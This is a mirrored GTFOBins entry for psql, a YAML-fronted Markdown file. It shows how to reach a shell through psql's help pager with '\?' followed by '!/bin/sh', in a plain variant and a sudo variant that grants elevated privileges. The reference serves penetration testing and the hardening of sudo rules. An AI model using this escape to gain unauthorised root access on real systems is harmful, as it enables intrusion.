mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
15 lines
267 B
Markdown
15 lines
267 B
Markdown
---
|
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
psql
|
|
\?
|
|
!/bin/sh
|
|
sudo:
|
|
- code: |
|
|
psql
|
|
\?
|
|
!/bin/sh
|
|
---
|